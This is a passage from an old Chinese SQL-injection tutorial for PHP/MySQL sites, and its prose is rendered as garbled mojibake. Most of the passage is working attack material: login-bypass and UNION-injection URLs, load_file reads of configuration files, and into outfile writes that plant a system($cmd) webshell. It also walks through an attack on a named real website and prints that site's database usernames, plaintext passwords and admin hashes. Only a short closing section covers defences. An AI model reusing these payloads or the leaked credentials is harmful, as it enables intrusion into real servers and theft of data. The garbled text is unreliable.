?>
ÎÒÃÇÖ±½ÓÔÚä¯ÀÀÆ÷Ìá½»
http://localhost/admin/login.php?username=char(97,98)) or 1=1 %23
´øÈësqlÓï¾ä³ÉΪselect * from alphaauthor where UserName=md5(char(97,98)) or 1=1 #) and Password='".$Pw."'
¼ÇµÃmd5ÀïÃæ·ÅµÄÊÇ×Ö·û£¬ÒòΪºóÃæÓÐor 1=2£¬ËùÒÔÎÒÃÇËæ±ã·ÅÁ˸öchar(97,98). Ok£¬µÇ½³É¹¦ÁËŶ£¡¿´¿´£¬md5ÔÚÎÒÃÇÃæǰҲûÓÐʲôÓô¦¡£
5. ºËÐļ¼Êõ£¬ÀûÓÃphp+mysql×¢È멶´Ö±½ÓдÈëwebshell¡£¡£
Ö±½ÓÀûÓÃ×¢ÈëµÃµ½webshell£¬ÕâÓ¦¸ÃÊÇ´ó¼Ò¶¼ºÜÏëµÄ°É£¬ÏÂÃæ¾Í½Ì¸øÄã¡£
ÕâÀï¼ÙÉèÄãÒѾ­ÖªµÀÁËÍøÕ¾ËùÔÚµÄÎïÀí·¾¶£¬ÎÒÕâÀï¼ÙÉèÍøվ·¾¶Îªc:/apache/htdocs/site¡£ÍøÕ¾µÄmysqlÁ¬½ÓÐÅÏ¢·ÅÔÚ/lib/sql.inc.phpÀï
1£©ÊÊÓÃÓÚmagic_quotes_gpc£½Off
¼ÙÉèÎÒÃÇ¿ÉÒÔÉÏ´«Í¼Æ¬£¬»òÕßtxt£¬zip£¬µÈÆäËü¶«Î÷£¬ÎÒÃÇ°ÑÎÒÃǵÄľÂí¸Ä³É
jpgºó׺µÄ£¬ÉÏ´«ºó·¾¶Îª/upload/2004091201.jpg
2004091201.jpgÖеÄÄÚÈÝΪ <?php system($cmd); ?>
ºÃ£¬ÎÒÃÇ¿ªÊ¼http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file('C:/apache/htdocs/site/upload/2004091201.jpg'),4,5,6,7,8,9,10,11%20into%20outfile'C:/apache/htdocs/site/shell.php'
ÒòΪÊÊÓÃÁËoutfile£¬ËùÒÔÍøÒ³ÏÔʾ²»Õý³££¬µ«ÊÇÎÒÃǵÄÈÎÎñÊÇÍê³ÉÁË¡£
Èçͼ28
ÎÒÃǸϿìÈ¥¿´¿´http://localhost/site/shell.php?cmd=dir
Èçͼ29

ˬ·ñ£¿WebshellÎÒÃÇÒѾ­´´½¨³É¹¦ÁË¡£¿´µ½×îÇ°ÃæµÄ12ÁËû£¿ÄǾÍÊÇÎÒÃÇselect 1£¬2ËùÊä³öµÄ£¡
2£©ÏÂÃæÔÙ½²Ò»¸öÊÊÓÃÓÚmagic_quotes_gpc£½OnµÄʱºò±£´æwebshellµÄ·½·¨Å¶£¬ÏÔÈ»¿Ï¶¨Ò²ÄÜÓÃÔÚÓÚmagic_quotes_gpc£½OffµÄʱºòÀ²¡£
ÎÒÃÇÖ±½Ó¶ÁËûµÄÅäÖÃÎļþ£¬Óü¼ÇÉ2½éÉܵķ½·¨
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870),4,5,6,7,8,9,10,11
µÃµ½sql.inc.phpÄÚÈÝΪ
<?$connect=@mysql_connect("localhost","root","") or die("Unable to connect to SQL server");mysql_select_db("alpha",$connect) or die("Unable to select database");?>
ºÃÁËÎÒÃÇÖªµÀÁËmysqlµÄrootÃÜÂëÁË£¬ÎÒÃÇÕÒµ½phpmyadminµÄºǫ́
http://localhost/phpmyadmin/
ÓÃrootÃÜÂëΪ¿ÕµÇ½¡£
Èçͼ30
È»ºóÎÒÃÇн¨Á¢Ò»¸ö±í½á¹¹ÄÚÈÝÈçÏ£º

#
# Êý¾Ý±íµÄ½á¹¹ `te`
#
CREATE TABLE te (
cmd text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

#
# µ¼³öÏÂÃæµÄÊý¾Ý¿âÄÚÈÝ `te`
#
INSERT INTO te VALUES ('<?php system($cmd); ?>');
Ok£¬ÊÇÎÒÃÇÓÃselect * from table into outfile¡¯¡¯µÄʱºòÁË
Ö±½ÓÔÚphpmyadminµÄsqlÊäÈë
SELECT * FROM `te` into outfile 'C:/apache/htdocs/site/cmd1.php';
Èçͼ31

Ok£¬³É¹¦Ö´ÐУ¬ÎÒÃÇÈ¥http://localhost/site/cmd1.php?cmd=dir¿´¿´Ð§¹ûÈ¥
Èçͼ32

ºÃˬµÄÒ»¸öwebshellÊÇ°É£¡¹þ¹þ£¬ÎÒÒ²ºÜϲ»¶¡£
²»¹ý²»ÖªµÀ´ó¼ÒÓÐûÓз¢ÏÖÎÒÃÇÊÇÔÚmagic_quotes_gpc£½OnµÄÇé¿öÏÂÍê³ÉÕâÏ×÷µÄ£¬¾¹È»ÔÚphpmyadminÀï¿ÉÒÔ²»Óÿ¼ÂÇÒýºÅµÄÏÞÖÆ£¬¹þ¹þ£¬ËµÃ÷ʲô£¿ËµÃ÷phpmyadmin̫ΰ´óÁË£¬ÕâÒ²¾ÍÊÇÎÒÃÇÔÚ̸magic_quotes_gpc£½OnÈƹýʱËùÂôµÄÄǸö¹Ø×ÓÀ²£¡
6.·¢ÏÖûÓÐÎÒÃÇ»¹¿ÉÒÔÀûÓÃupdateºÍinsertÀ´²åÈëÎÒÃǵÄÊý¾Ý£¬È»ºóÀ´µÃµ½ÎÒÃǵÄwebshellŶ£¬»¹ÓÃÉÏÃæµÄÄǸöÀý×Ó£¬
<?php
//reg.php
¡­¡­
$query = "INSERT INTO members
VALUES('$id','$login','$pass','$email',¡¯2')" ;
¡­¡­
?>
ÎÒÃÇÔÚemailµÄµØ·½ÊäÈë<?php system($cmd); ?>
¼ÙÉèÎÒÃÇ×¢²áºóµÄidΪ10
ÄÇôÎÒÃÇ¿ÉÒÔÔÙÕÒµ½Ò»¸ö¿ÉÒÔ×¢ÈëµÄµØ·½
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,email,4,5,6,7,8,9,10,11%20from%20user%20where%20id=10%20 into%20outfile'C:/apache/htdocs/site/test.php'
ºÃÁË£¬ÎÒÃÇÓÖÓÐÁËÎÒÃǵÄwenshellÁËŶ¡£
7.mysqlµÄ¿ç¿â²éѯ
´ó¼ÒÊDz»ÊÇÒ»Ö±Ìý˵mysql²»ÄÜ¿ç¿â²éѯ°¡£¬¹þ¹þ£¬½ñÌìÎÒ½«Òª½Ì´ó¼ÒÒ»¸öºÃ·½·¨£¬Í¨¹ýÕâ¸ö·½·¨À´ÊµÏÖ±äÏàµÄ¿ç¿â²éѯ£¬·½·¨¾ÍÊÇͨ¹ýload_fileÀ´Ö±½Ó¶Á³ömysqlÖÐdataÎļþ¼ÐϵÄÎļþÄÚÈÝ£¬´Ó¶øʵÏÖ±ä̬¿ç¿â²éѯ¡£
¾Ù¸öÀý×ÓÀ²
ÔÚÕâ֮ǰÎÒÃÇÏȽ²Ò»ÏÂmysqlµÄdataÎļþ¼ÐϵĽṹ
DataÎļþ¼ÐÏÂÓа´Êý¾Ý¿âÃûÉú³ÉµÄÎļþ¼Ð£¬Îļþ¼ÐÏ°´ÕÕ±íÃûÉú³ÉÈý¸öºó׺Ϊfrm,myd,myiµÄÈý¸öÎļþ£¬ÀýÈç
MysqlÖÐÓÐalphaÊý¾Ý¿â£¬ÔÚalpha¿âÖÐÓÐalphaauthorºÍalphadbÁ½¸ö±í£¬
AlphaÎļþ¼ÐÄÚÈÝÈçÏÂͼ33

ÆäÖÐalphadb.frm·Å×Ålphadb±íÖеÄÊý¾Ý£¬alphadb.frm·Å×űíµÄ½á¹¹£¬alphadb.myiÖзŵÄÄÚÈÝËæmysqlµÄ°æ±¾²»Í¨»áÓÐËù²»Í¬£¬¾ßÌå¿ÉÒÔ×Ô¼ºÓüÇʱ¾´ò¿ªÀ´Åжϡ£
ʵÑ鿪ʼ
¼ÙÉèÎÒÃÇÖªµÀÓÐÁíÍâµÄÒ»¸öÊý¾Ý¿âyminfo210´æÔÚ£¬ÇÒ´æÔÚ±íuser£¬userÖзÅÕâadminµÄÐÅÏ¢¡£
ÎÒÃÇ
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file('yminfo210/user.myd'),4,5,6,7,8,9,10,11
˵Ã÷һϣ¬load_fileĬÈÏËùÔÚµÄĿ¼ÊÇmysqlϵÄdataĿ¼£¬ËùÒÔÎÒÃÇÓÃ
load_file('yminfo210/user.myd')£¬µ±È»load_file('.info210/user.myd')Ò²ÊÇÒ»ÑùµÄ£¬×¢ÒâµÄÊÇinto outfileµÄĬÈÏ·¾¶ÊÇÔÚËùÔÚµÄÊý¾Ý¿âÎļþ¼ÐÏ¡£

½á¹ûÈçͼ34

ÎÒÃÇ¿´¶Á³öÀ´µÄÄÚÈÝ
Å|ÿÿ? admin 698d51a19d8a121ce581499d7b701668 admin@yoursite.comadmin question admin answer http://www.yoursite.com (?ì[?ûûKAì[?ì[? 127.0.0.1 d|?ÿ? aaa 3dbe00a167653a1aaee01d93e77e730e sdf@sd.com sdfasdfsdfa asdfadfasd ?EüKAMüKA 127.0.0.1 222 222222223423
ËäÈ»ÂÒÂëÒ»¶Ñ£¬µ«ÊÇÎÒÃÇ»¹ÊÇ¿ÉÒÔ¿´³öÓû§ÃûÊÇadmin£¬ÃÜÂëÊÇ698d51a19d8a121ce581499d7b701668£¬ºóÃæÆäËüµÄÊÇÁíÍâµÄÐÅÏ¢¡£
ͨ¹ýÕâÖÖ·½·¨ÎÒÃǾÍʵÏÖÁËÇúÏß¿ç¿â£¬ÏÂÃæµÄÀý×ÓÖÐÒ²»áÌᵽŶ£¡

˵ÁËÕâô¶àÏÂÃæÎÒÃÇÀ´¾ßÌåµÄʹÓÃÒ»´Î£¬Õâ´Î²âÊԵĶÔÏóÊǹúÄÚÒ»ÖøÃû°²È«ÀàÕ¾µã¨D¨DºÚ°×ÍøÂç
ÌýÈ˼Ò˵ºÚ°×ÓЩ¶´£¿ÎÒÃÇÒ»ÆðÈ¥¿´¿´°É¡£
http://www.heibai.net/down/show.php?id=5403%20and%201=1
Õý³£ÏÔʾ¡£
Èçͼ35

http://www.heibai.net/down/show.php?id=5403%20and%201=2
ÏÔʾ²»Õý³£¡£
Èçͼ36

ºÃ£¬ÎÒÃǼÌÐø
http://www.heibai.net/down/show.php?id=5403%20and%201=1 union select 1
ÏÔʾ½á¹ûÈçÏÂ
Èçͼ37

×¢Ò⿴ͼÖÐûÓÐÏÔʾ³ÌÐòÃû£¬¶øÇÒ»¹¸½´øÁË
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\show.php on line 45

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\global.php on line 578

ÔÎÁË£¬Íøվ·¾¶³öÀ´ÁË£¬ÄǿɾÍËÀ¶¨ÁËŶ£¡
ÎÒÃǼÌÐø£¬Ö±µ½ÎÒÃDzµ½
http://www.heibai.net/down/show.php?id=5403%20and%201=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
µÄʱºòÕý³£ÏÔʾÁË¡£
Èçͼ38

ºÃÎÒÃÇת»»Óï¾ä³ÉΪ
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
ÏÔʾÈçͼ39

¿´¿´¼ò½é´¦ÏÔʾΪ12£¬ÎÒÃÇ¿ÉÒԲ²â´Ë´¦Ó¦¸ÃΪ×Ö·ûÐÍ£¡
Ok£¬ÎÒÃÇÏÂÃæ¿´¿´ÎļþÄÚÈÝÏÈ
D:/web/heibai/down/show.phpת»¯³ÉasciiºóΪ
char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)
ÎÒÃÇ
view-source:http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)),13,14,15,16,17,18,19
view-source:ÊÇÖ¸²ì¿´Ô´´úÂ룬ÖÁÓÚΪʲôÓã¬ÎÒÃǺóÃ潫½²µ½
ÏÔʾ³öËüµÄÔ´´úÂë
Èçͼ40

ÒòΪÔÚshow.phpÖÐÓÐÒ»¾ä
<META HTTP-EQUIV=REFRESH CONTENT='0;URL=list.php'>
Èç¹ûÎÒÃÇÖ±½ÓÔÚä¯ÀÀÆ÷ÀïÌá½»»áÌøתµ½list.php
ÎÒÃÇ·¢ÏÖÕâ¾ärequire ("./include/config.inc.php");
ºÃ¶«Î÷£¬Ó¦¸Ã·ÅÕâÅäÖÃÎļþ£¬ok¼ÌÐø
d:/web/heibai/down/include/config.inc.php
ת»¯³Échar(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
ÎÒÃÇÊäÈë
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19
ÏÔʾ½á¹ûÈçͼ41

ÀïÃæÄÚÈÝÖ÷ÒªÓÐ
¡­¡­¡­¡­¡­¡­¡­..
ymDown (ҹèÏÂÔØϵͳ) ÊÇÒ»¸öÓ¦ÓÃÓÚÍøÕ¾ÌṩÏÂÔØ·þÎñµÄµÄ³ÌÐò
// ------------------------- -------- ------------------------- //
// ³£¹æÉèÖà //
// ------------------------- -------- ------------------------- //


// Êý¾Ý¿âÐÅÏ¢
$dbhost = "localhost"; // Êý¾Ý¿âÖ÷»úÃû
$dbuser = "download";// Êý¾Ý¿âÓû§Ãû
$dbpasswd = "kunstar988"; // Êý¾Ý¿âÃÜÂë
$dbname = "download"; // Êý¾Ý¿âÃû

// Cookie Ãû³Æ
$cookie_name = "heibai";
// °æ±¾ºÅ
$version = "1.0.1";

// Êý¾Ý±íÃû
$down_table = ymdown;
$down_user_table = ymdown_user;
$down_sort1_table = ymdown_sort1;
$down_sort2_table = ymdown_sort2;
ÔÎÔ­À´ÓõÄÊÇҹèµÄÏÂÔØϵͳ£¬¶øÇÒÎÒÃÇÖªµÀÁË
$dbuser = "download";// Êý¾Ý¿âÓû§Ãû
$dbpasswd = "kunstar988"; // Êý¾Ý¿âÃÜÂë
˵²»¶¨´ô»áÓÐÓÃŶ¡£
ÓõıíÃûÊÇĬÈϵıíÃû£¬ÎÒÃÇÖªµÀҹèµÄ¹ÜÀíÔ±ÃÜÂë·ÅÔÚymdown_userÖÐ
ÎÒÃǼÌÐøhttp://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,username,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19 from ymdown_user
½á¹ûÈçͼ42

¸ù¾ÝÌáʾÎÒÃÇÖªµÀÎļþ´óС´¦µÄÊÇusername£¬Ó¦ÓÃƽ̨´¦µÄÊÇpassword£¨¶ÔÕÕͼ36£©
¼´username=dload£¬password£½6558428£¬Ò¹Ã¨µÄºǫ́ĬÈÏÔÚadminĿ¼Ï£¬ÎÒÊÔÑéÁ˺ܾö¼Ã»ÓÐÕÒµ½£¬ÔÎÖ®¡£
ÏëÖ±½ÓÁ¬½Ómysql£¬·¢ÏÖtelnet¶Ë¿Ú²¢Ã»Óпª·Å¡£ÎÒÃÇÈ¥¿´¿´±ðµÄ°É£¡
http://www.heibai.net/vip/article/login.php
¿´ÆðÀ´ÏñÊÇ»áÔ±µÄµÇ½Ŷ£¬ÎÒÃÇ¿´¿´ÏÈ
d:/web/heibai/vip/article/login.php
ת»¯³Échar(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)
ÎÒÃÇÊäÈë
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)),13,14,15,16,17,18,19
½á¹ûÈçͼ43£º

ÆäÖÐ
require ("./include/global.php");
require ("./include/config.inc.php");
require ("./mainfunction.php");
require ("./function.php");
µ±È»ÁË£¬ÎÒÃÇÈ¥¿´config.inc.php°É
d:/web/heibai/vip/article/include/config.inc.php
ת³Échar(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
ÊäÈë
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19
½á¹ûÈçͼ44

ÏÔʾÁ˺ܶàºÃ¶«Î÷Ŷ

$dbhost = "localhost"; // Êý¾Ý¿âÖ÷»úÃû
$dbuser = "root"; // Êý¾Ý¿âÓû§Ãû
$dbpass = "234ytr8ut"; // Êý¾Ý¿âÃÜÂë
$dbname = "article"; // Êý¾Ý¿âÃû
$ymcms_user_table = "user";
$ymcms_usergroup_table = "usergroup";
$ymcms_userrace_table = "userrace";
±í»¹ÊÇĬÈÏµÄ±í£¬¶øÇÒ³öÀ´ÁËrootµÄÃÜÂë
ÒªÊÇÄÜÁ¬ÉÏËüµÄmysql¸Ã¶àºÃ°¡£¬ÄÇÑùÎÒÃǾͿÉÒÔinto outfileÁË
Í´¿àµÄÕÒÁËÕÒphpmyadmin£¬Ã»ÓÐÕÒ¼û£¬»òÐí¸ù±¾¾ÍûÓÐÓá£
¶Ác:/winnt/php.ini·¢ÏÖ
; Magic quotes
;
; Magic quotes for incoming GET/POST/Cookie data.
magic_quotes_gpc = On
55555555£¬Í´¿àÖУ¬ÎÒÃÇ¿´¿´Äܲ»Äܸ㼸¸ö»áÔ±Õ˺Å
²Â²â»áÔ±Õ˺ŷÅÔÚuser±íÖУ¬ÎÒÃÇÖ±½Ó¶ÁdataÏÂarticleÎļþ¼ÐÀïµÄuser.mydÎļþ
Article/user.mydת»»³É
char(97,114,116,105,99,108,101,47,117,115,101,114,46,109,121,100)
ÎÒÃÇÊäÈë
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(97,114,116,105,99,108,101,47,117,115,101,114,46,109,121,100)),13,14,15,16,17,18,19
½á¹ûÈçͼ45£º

ÔÎÁË£¬¾¹È»Ã»Óзµ»Ø¡£ÎÒÃÇÀ´¶ÁArticle/user.frm
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(97,114,116,105,99,108,101,47,117,115,101,114,46,102,114,109)),13,14,15,16,17,18,19
½á¹ûÈçͼ46

ÔÎÁË£¬±í½á¹¹¶¼ÔÚ£¬¶øÇÒ¶ÁArticle/user.myiʱҲ³É¹¦£¬¿ÉÊÇΪʲôArticle/user.myd¶Á²»³öÀ´ÄØ?ÒªÊÇmagic_quotes_gpc£½OffÎÒÃÇ»¹¿ÉÒÔinto outfileÀ´¿´¿´£¬¿ÉÊÇ¡­¡­
ÓôÃÆÖУ¬²âÊÔ¾ÍÕâÑù½áÊø°É£¬ÏÂÃæµÄ¹¤×÷»¹ÊÇÁô¸øÄãÃÇÀ´Íê³É°É£¡
ÎÄÖÐËùÊöÎÊÌâÒѾ­Í¨ÖªÐÇÀ¤ÁË£¡
ËÄ£ºphp£«mysql×¢ÈëµÄ·À·¶·½·¨¡£
ÔÚÉÏÒ»ÆÚµÄרÌâÀïÒѾ­½²Á˺ܶàµÄ·À·¶·½·¨£¬ÕâÀïÎÒ¾ÍÖ÷Òª½²Ò»ÏÂphp+mysql×¢Éä¹¥»÷µÄ·À·¶·½·¨¡£
´ó¼Ò¿´µ½£¬ÔÚmagic_quotes_gpc£½OnµÄʱºò£¬ºÜ¶àµÄ×¢Éä¹¥»÷ÒѾ­Ã»ÓÐ×÷ÓÃÁË¡£
ÎÒÃÇ¿ÉÒÔÀûÓÃÕâ¸öÀ´¼Ó¹ÌÎÒÃǵijÌÐò¡£Addslashes£¨£©º¯ÊýµÈͬÓÚmagic_quotes_gpc£½On£¬¶øÇÒÓëmagic_quotes_gpc£½OnÒ²²»³åÍ»£¬ÎÒÃÇ¿ÉÒÔÕâÑù¹ýÂË
$username = addslashes($username);
$query="SELECT * FROM users WHERE userid='$username'");
¶ÔÓÚidÐÍÎÒÃÇ¿ÉÒÔÀûÓÃintval()º¯Êý£¬intval()º¯Êý¿ÉÒÔ½«±äÁ¿×ª»»³ÉÕûÊýÀàÐÍ£¬ÕâÑù¾Í¿ÉÒÔÁË¡£
ÎÒÃÇ¿ÉÒÔÕâÑù
$id = intval($id);
$query="SELECT * FROM alphadb WHERE articleid='$id'");
Èç¹ûÊÇ×Ö·ûÐ͵ÄÄØ£¿
ÎÒÃÇ¿ÉÒÔÏÈÓÃaddslashes()¹ýÂËһϣ¬È»ºóÔÙ¹ýÂË¡±%¡±ºÍ¡±_¡±.
ÀýÈ磺
$search = addslashes($search);
$search = str_replace("_","\_",$search);
$search = str_replace("%","\%",$search);
¼ÇµÃ£¬¿ÉǧÍò±ðÔÚmagic_quotes_gpc£½OnµÄÇé¿öÏÂÌæ»»\Ϊ\\,ÈçÏ£º
$password=str_replace("\\","\\\\",$password);
ÎҼǵÃÔÚdarknessµÄÎÄÕ¡¶¶ÔijPHPÕ¾µãµÄÒ»´ÎÉø͸¡·ÖÐÌáµ½¹ýÕâ¸öÎÊÌ⣨ÔÚ¹âÅÌÖÐÓÐÊÕ¼£©¡£
»¹ÓеľÍÊǵǽµÄµØ·½£¬Èç¹ûÊÇÖ»ÓÃÒ»¸ö¹ÜÀíÔ±¹ÜÀíµÄ»°£¬ÎÒÃÇ¿ÉÒÔÖ±½Ó¶ÔusernameºÍpasswdÓÃmd5¼ÓÃÜ£¬ÕâÑù¾Í²»Óú¦ÅÂ×¢Èë¼¼ÊõµÄ·¢Õ¹ÁË¡£
Username=md5($HTTP_POST_VARS["username"]);
Passwd=md5($HTTP_POST_VARS["passwd"]);
Îҵĺǫ́µÇ½¾ÍÊÇÕâÑù×ÓµÄŶ¡£
ºó¼Ç£º
±¾Îľͽ²Õâô¶àÁË£¬×¢ÈëÊÇÒ»ÃÅÁé»îµÄ¼¼Êõ£¬Óкܶ༼Êõ»¹ÔÚ¼ÌÐø·¢Õ¹ÖУ¬ÓÐÈκÎÎÊÌâºÍÒâ¼û¿ÉÒÔµ½Ñ׻ƱøÍÅ(www.cnwill.com/www.securityfaq.org)À´ÕÒÎÒ£¬Ò²»¶Ó­¶ÔÎÄÖÐÄÚÈÝÅúÆÀÖ¸Õý¡£Îª±ãÓÚ´ó¼Òѧϰ±¾ÎÄËùÓõ½µÄÎÄÕÂϵͳҲ½«Ëæ¹âÅ̸½ËÍ¡£
ºóºó¼Ç£º
´ËÎÄ»¹ÊÇÒ»ÄêÇ°Ëù×÷£¬Ê±ÖÁ½ñÈÕ£¬ºÜ¶àµÄеļ¼Êõ¶¼ÒѾ­Ó¿ÏÖ³öÀ´£¬¾ßÌåµÄÄÚÈÝÇë²ÎÔÄ°²È«Ììʹwww.4ngel.netÍøÕ¾£¬¹ØÓÚ±¾ÎĵÄÈκÎÎÊÌâÄú¿ÉÒÔµ½www.securityfaq.orgÌá³ö¡£
-------Alpha-------
20050309
ÍøÂ簲ȫÈÈÃÅÎÄÕÂÅÅÐÐ
ÍøÕ¾ÔÞÖúÉÌ
¹ºÂò´ËλÖÃ

 

¹ØÓÚÎÒÃÇ | ÍøÕ¾µØͼ | ÎĵµÒ»ÀÀ | ÓÑÇéÁ´½Ó| ÁªÏµÎÒÃÇ

Copyright © 2003-2024 µçÄÔ°®ºÃÕß °æȨËùÓÐ ±¸°¸ºÅ£ºÂ³ICP±¸09059398ºÅ